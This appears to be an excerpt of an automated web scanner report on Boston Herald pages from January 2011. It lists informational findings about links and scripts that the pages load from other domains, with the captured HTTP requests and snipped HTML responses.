<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4873','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110127/stp/ecbe1f_012610nkotbar04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4849','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/1a0e4b_012011celtsnl03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4794','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110109/stp/d94239_010711folkap02.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4766','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/d99d87_123110firstnightsc04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011">Purchase</a>
...[SNIP]...
<div class="gutter_teaseInner" style="padding: 0px; padding-bottom:10px;" >

<img width="100%" src="http://multimedia.heraldinteractive.com/images/20110127/3057c6_Plow_01282011.jpg" />

<div style="padding: 0px 10px 0px 10px;">
...[SNIP]...
<p><a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/photo/?photo_name=3057c6_Plow_01282011" ><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mediacenter/btn_order_prints_yellow.png" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<li>
<a href="http://gallery.pictopia.com/bostonherald/"><h3>
...[SNIP]...
<div class="gutter_teaseInner">
<a href="http://gallery.pictopia.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/purchasePhotos.gif" /></a>
...[SNIP]...
<br />
<a href="http://gallery.pictopia.com/bostonherald/">Click here</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</body>


       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

17.275. http://www.bostonherald.com/mediacenter/video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:58:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2589
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">


        <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js"></script>
...[SNIP]...

17.276. http://www.bostonherald.com/mediacenter/video.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2489
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

17.277. http://www.bostonherald.com/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /news/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:18:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 105318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="News &amp; Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/news/regional/view.bg?articleid=1312541&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Feds: Fake cop scammed dates"></a>
...[SNIP]...
<a href="http://bostonherald.com/news/politics/view.bg?articleid=1312665&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<a href="http://bostonherald.com/news/regional/view.bg?articleid=1312552&srvc=news&position=2"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/news/regional/view.bg?articleid=1312552&format=comments&srvc=news&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="http://bostonherald.com/news/regional/view.bg?articleid=1312552&srvc=news&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="http://bostonherald.com/news/regional/view.bg?articleid=1312552&position=0">
...[SNIP]...
<a href="http://bostonherald.com/news/national/general/view.bg?articleid=1312565&srvc=news&position=3"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/da98aa_Shuttle_01282011.jpg" alt="A PORTRAIT OF A &#x2028;DISASTER: In this picture taken at Cape Canaveral on Jan. 28, 1986, the Space Shuttle Challenger lifts off launch pad on its ill-fated flight."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/news/national/general/view.bg?articleid=1312565&format=comments&srvc=news&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="http://bostonherald.com/news/national/general/view.bg?articleid=1312565&srvc=news&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/news/columnists/view.bg?articleid=1312540&format=comments&srvc=news&position=4">
...[SNIP]...
<a href="/news/police_logs/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" />
</a>
...[SNIP]...
<a href="/throwdown">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/news/throwdown/FridayThrowdown0610_234x60.jpg" alt="Friday Throwdown" width="177" height="57" />
</a>
...[SNIP]...
<li style="margin:0 0 0 0">
<img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=news&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=news&position=also">
...[SNIP]...
<a href="/news/national/southwest/view/20110128slain_missionary_had_worried_about_mexico_violence/srvc=news&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/1c877a_missionary012811.jpg" alt="A pray card handed out by Sam and Nancy Davis, missionaries working in Mexico, is shown in Wesfield, Ind., Thursday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/national/southwest/view/20110128slain_missionary_had_worried_about_mexico_violence/format=comments&srvc=news&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/regional/view/20110128transport_chief_cites_confluence_causing_delays/format=comments&srvc=news&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/opinion/op_ed/view/20110128no_reason_to_peak_too_soon_waiting_game_may_be_mitts_strategy/format=comments&srvc=news&position=also">
...[SNIP]...
<a href="/news/international/africa/view/20110128egypt_imposes_night_curfew_after_day_of_riots/srvc=news&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/097956_ltpEgyptC012811.jpg" alt="An anti-government protester burns furniture outside of a looted building, near Tahrir Square, in Cairo, Egypt, Friday, Jan. 28, 2011." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/international/africa/view/20110128egypt_imposes_night_curfew_after_day_of_riots/format=comments&srvc=news&position=also">
...[SNIP]...
<a href="/news/us_politics/view/20110128sarah_palin_issues_scathing_response_to_obama_speech/srvc=news&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/e20609_spalin012811.jpg" alt="Sarah Palin." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/us_politics/view/20110128sarah_palin_issues_scathing_response_to_obama_speech/format=comments&srvc=news&position=also">
...[SNIP]...
<a href="/news/columnists/view/20110127what_next_baby_botox_little_girls_makeup_line_a_travesty/srvc=news&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/be916e_geo_01272011.jpg" alt="Wal-Mart&rsquo;s new GeoGirl beauty line for ages 8-12." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/news/columnists/view/20110127what_next_baby_botox_little_girls_makeup_line_a_travesty/format=comments&srvc=news&position=also">
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news" target="_new">All News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/regional/" target="_new">Local News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/regional/politics/" target="_new">Local Politics</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/opinion/columnists/" target="_new">Columnists</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/opinion/" target="_new">Opinion</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/national/offbeat/" target="_new">Off Beat</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/national/" target="_new">National News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/national/politics/" target="_new">U.S. Politics</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/international/" target="_new">International</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/news/obituaries/" target="_new">Obituaries</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/MediaBizBlog.gif" alt="The holiday radio ratings rundown" />
           The holiday radio ratings rundown
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/theLoneRepublican.gif" alt="Up, Up and Away Pelosi" />
           Up, Up and Away Pelosi
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/cityDeskWired.gif" alt="Falmouth cops: Don't come here" />
           Falmouth cops: Don't come here
           </a>
...[SNIP]...
<!-- // NDN Widget // -->
<iframe style="position: relative; margin-bottom: 14px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312654"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/cc02b1_ltpRomneyA012811.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.278. http://www.bostonherald.com/news/columnists/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/columnists/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /news/columnists/?srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:46:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
